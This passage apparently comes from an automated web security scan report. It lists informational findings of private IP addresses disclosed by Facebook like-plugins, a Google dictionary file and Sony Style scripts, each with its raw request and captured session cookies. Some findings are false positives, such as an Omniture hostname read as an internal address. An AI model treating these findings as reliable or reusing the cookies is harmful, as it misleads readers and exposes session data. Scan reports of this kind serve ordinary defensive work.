
Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.225.54

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.20. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.252.43

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.21. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.22.50

Request

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df11f01aff%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F05%2Fimportant-step-for-service-restoration%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.22. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.54.41

Request

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2dc1cca6%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F06%2Fservice-restoration-update%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.23. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.79.41

Request

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2d74abe9c%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F05%2Fa-letter-from-howard-stringer%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.24. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.110.30

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df27abf928%26origin%3Dhttp%253A%252F%252Fwww.telegraph.co.uk%252Ff3972649c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.telegraph.co.uk%2Fsponsored%2Ftravel%2F8509794%2FWin-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.25. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.49.39

Request

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1a39fa58%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff1b508b9bc%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F04%2F26%2Fupdate-on-playstation-network-and-qriocity%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.26. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.24.45

Request

Response

26.27. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.231.44

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.28. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.247.57

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.29. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.214.48

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.30. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.1.114

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1ba9f8d8%26origin%3Dhttp%253A%252F%252Fwww.telegraph.co.uk%252Ff42dbbf0%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.telegraph.co.uk%2Fsponsored%2Ftravel%2Fdisney%2F8509938%2FDisney-Cruise-Line-A-world-of-entertainment.html&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=360 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.31. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.230.52

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.32. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.9.64

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.33. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.19.25

Request

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df16595e8a8%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F14%2Fkazuo-hirai-playstation-network-relaunch-announcement%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.34. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.99.35

Request

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df30740f1b%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F05%2Fsony-offering-free-allclear-id-plus-identity-theft-protection-in-the-united-states-through-debix-inc%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

26.35. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.68.45

Request

Response

26.36. http://www.google.com/sdch/vD843DpA.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/vD843DpA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/vD843DpA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=X0FYGmfTMyj1F459tNArdzOEBt_RZ2SblIezIj5PNBGR3jQME9gQohiVBgO7qW2uuK6LmpVtHT1ukJzdFNGFyH2UtPYO_X4n6dxuajnk48nYL-oftk6H-Nz9AjrWiY35
If-Modified-Since: Sun, 15 May 2011 03:44:29 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Sun, 15 May 2011 23:13:23 GMT
Date: Mon, 16 May 2011 00:02:13 GMT
Expires: Mon, 16 May 2011 00:02:13 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 116591

Domain: .google.com
Path: /search

<!doctype html> <head> <title>re - Google Search</title> <script>window.google={kEI:"28555,29481,2966,29876,29881,29891,30035,30039,30058",kCSI:{e:"25907,4,29
...[SNIP]...
<a href="/search?hl=en&q=related: http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCN clk(this.href,'','','','1','','0CCk ')">
...[SNIP]...
<b>www.ahttp://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCN clk(this.href,'','','',' UBEBYwBg')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:www.edmunds.com/used-cars/+used+carNKvLeHS7sb0J:www.carsdirect.com/used_cars/search+used+car&hl=en&ct=clnk&gl=us&source=www.google.com','','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content/contact_us+directKvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account+direct 4','AFQjCN clk(this.href,'','','','4',''
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car topics.nytimes.com/top/news/business/ &rct=j&sa=
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4AUACFJFdYwJ:search.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &hl=en&ct=clnk&gl=us&source=www.google
...[SNIP]...
<a href="/search?hl=en&q=related:http://172.31.196.197:8888/search?q=cache: &cd= &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGclk(this.href,'','','','1','','0C QIDAG')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:_AF_a1pfx4YJ:www.craigslist.com/+o&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','',' clk(this.href,'','','','8',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','',' 9','AFQjCNFclk(this.href,'','','','9','','0C en.wikipedia.org
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNFclk(this.href,'','','','1rwt(this,'','','','1 cl
...[SNIP]...

26.37. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.112.2

Request

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 13 May 2011 19:22:00 GMT
Accept-Ranges: bytes
ntCoent-Length: 28936
Content-Type: application/x-javascript
Content-Length: 28936
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:19:52 GMT
Connection: close
Cache-Control: private

// TEMPORARY FREEZE OVERRIDE
function unFreezePage() {}
function freezePage() {
   popOpen('busyIndicator');
   document.getElementById('busyIndicator').style.cursor = "wait";

   var delayedFuncti
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

26.38. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.112.2

Request

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 03 May 2011 21:22:34 GMT
Accept-Ranges: bytes
ntCoent-Length: 20033
Content-Type: application/x-javascript
Content-Length: 20033
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:19:51 GMT
Connection: close
Cache-Control: private

/*    SONY | SONY STYLE
*    Homepage JS Functions and Event Listeners
*
*    Author: Steve Rucker, Interactive Developer | B2C CST SAPE Augmentation team | srucker@sapient .com
* Alex Jain, Sr As
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

26.39. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.112.2

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout?langId=-1&storeId=10151&catalogId=10551&krypto=%2BIw6iFkoFJ1hQSYq1rIctg%3D%3D&ddkey=http:SYOrderCheckout
